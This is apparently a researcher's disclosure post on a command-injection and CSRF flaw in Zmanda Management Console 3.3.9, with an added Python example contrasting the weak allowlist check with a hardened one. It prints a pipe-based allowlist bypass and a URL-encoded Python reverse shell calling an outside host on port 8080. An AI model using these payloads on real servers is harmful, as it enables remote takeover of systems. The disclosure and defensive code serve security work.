Zmanda Management Console 3.3.9

Weak default credentials in combination with missing input validation allow a remote attacker to execute arbitrary code on a server running Zmanda Management Console 3.3.9.


Whitelisted commands can be executed via the following link, which has no CSRF protection at all:

"Only the following non-interactive commands are permitted: amadmin, amcheckdb, amcleanup, amdump, amflush, amlabel, amlabel, amreport, amrmtape, bzip2, chgrp, chmod, chown, cp, date, df, diff, du, echo, env, file, find, grep, gzip, head, ls, lsattr, lsscsi, man, md5sum, mkdir, mt, mtx, mv, nslookup, ping, ps, pstree, sha1sum, sha224sum, sha256sum, sha384sum, sha512sum, sort, star, stty, tail, tar, top, traceroute, tree, uname, uptime"

Clicking the following link will execute the "echo" command displaying the string "test":

By abusing the piping feature via "echo test | whoami", it's possible to bypass the restriction and execute the "whoami" command:|whoami

Leveraging that behavior makes it possible to execute arbitrary code using a Python reverse shell. Clicking the following link will connect the server to on port 8080, spawning a /bin/sh shell:|python%20-c%20%27import%20socket%2csubprocess%2cos%3bs%3dsocket%2esocket%28socket%2eAF_INET%2csocket%2eSOCK_STREAM%29%3bs%2econnect%28%28"s3cur3%2eeu"%2c8080%29%29%3bos%2edup2%28s%2efileno%28%29%2c0%29%3bos%2edup2%28s%2efileno%28%29%2c1%29%3bos%2edup2%28s%2efileno%28%29%2c2%29%3bp%3dsubprocess%2ecall%28%5b"%2fbin%2fsh"%2c"-i"%5d%29%3b%27
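The root cause described above is a whitelist that only looks at the first word of the command line and then hands the whole string to a shell. The following Python is an added illustration written for this post, not code from Zmanda or the console itself: `naive_is_allowed` is an assumed reconstruction of a first-token-only check (it accepts the piped bypass), `hardened_parse` shows the fix a defender would want (reject shell metacharacters, tokenize with `shlex`, run the argv directly without a shell), and `csrf_ok` shows the per-session token comparison that the vulnerable endpoint lacks. The allowlist is copied from the console's error message quoted above; everything else is an assumption.

```python
import hmac
import secrets
import shlex
import subprocess

# Allowlist taken from the error message the console itself prints (see above).
ALLOWED = {
    "amadmin", "amcheckdb", "amcleanup", "amdump", "amflush", "amlabel",
    "amreport", "amrmtape", "bzip2", "chgrp", "chmod", "chown", "cp", "date",
    "df", "diff", "du", "echo", "env", "file", "find", "grep", "gzip", "head",
    "ls", "lsattr", "lsscsi", "man", "md5sum", "mkdir", "mt", "mtx", "mv",
    "nslookup", "ping", "ps", "pstree", "sha1sum", "sha224sum", "sha256sum",
    "sha384sum", "sha512sum", "sort", "star", "stty", "tail", "tar", "top",
    "traceroute", "tree", "uname", "uptime",
}

# Characters that let a shell chain, redirect or substitute commands. Quotes are
# rejected too: none of the allowlisted tools needs them in a management console.
SHELL_META = set("|&;<>()$`\\\"'\n*?[]{}~")


def naive_is_allowed(cmdline: str) -> bool:
    """Assumed reconstruction of the weak check: only the first token is compared
    against the allowlist, so 'echo test | whoami' passes because 'echo' does."""
    first = cmdline.strip().split(" ", 1)[0]
    return first in ALLOWED


def hardened_parse(cmdline: str):
    """Return an argv list if the command line is safe to execute without a shell,
    otherwise None. Rejecting metacharacters up front means no pipe, redirection
    or command substitution can ever reach an interpreter."""
    if any(ch in SHELL_META for ch in cmdline):
        return None
    try:
        argv = shlex.split(cmdline)
    except ValueError:
        return None
    if not argv or argv[0] not in ALLOWED:
        return None
    return argv


def run_allowed(cmdline: str, timeout: float = 30.0) -> str:
    """Execute a validated command line as argv (shell=False) and return stdout."""
    argv = hardened_parse(cmdline)
    if argv is None:
        raise ValueError("command rejected by allowlist")
    proc = subprocess.run(argv, shell=False, capture_output=True,
                          text=True, timeout=timeout)
    return proc.stdout


def new_csrf_token() -> str:
    """Per-session token to be stored server-side and echoed in every form."""
    return secrets.token_urlsafe(32)


def csrf_ok(session_token: str, submitted: str) -> bool:
    """Constant-time comparison of the stored token with the submitted one; a
    plain GET link such as the ones in this post carries no token and is refused."""
    if not session_token or not submitted:
        return False
    return hmac.compare_digest(session_token, submitted)


if __name__ == "__main__":
    # Constructed inputs: the legitimate command and the piped bypass from the post.
    for line in ("echo test", "echo test | whoami"):
        print(f"{line!r}: naive={naive_is_allowed(line)} hardened={hardened_parse(line)}")
    print(run_allowed("echo test").strip())
```

The point of the comparison is that the naive check and the hardened check agree on "echo test" but disagree on "echo test | whoami": the first-token check is not a command allowlist at all once a shell sits behind it, while an argv-based execution with metacharacter rejection makes the allowlist mean what it says.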

Using network fingerprinting techniques, it's possible to exploit the vulnerability automatically, in combination with the weak default credentials, if an employee connected to the internal network visits a specially prepared website.

Reverse shell incoming


The vulnerability was disclosed to Zmanda prior to publishing the vulnerability details. Slides to my BSides Lisbon presentation can be found here.


Robert Kugler

Information security and human rights enthusiast
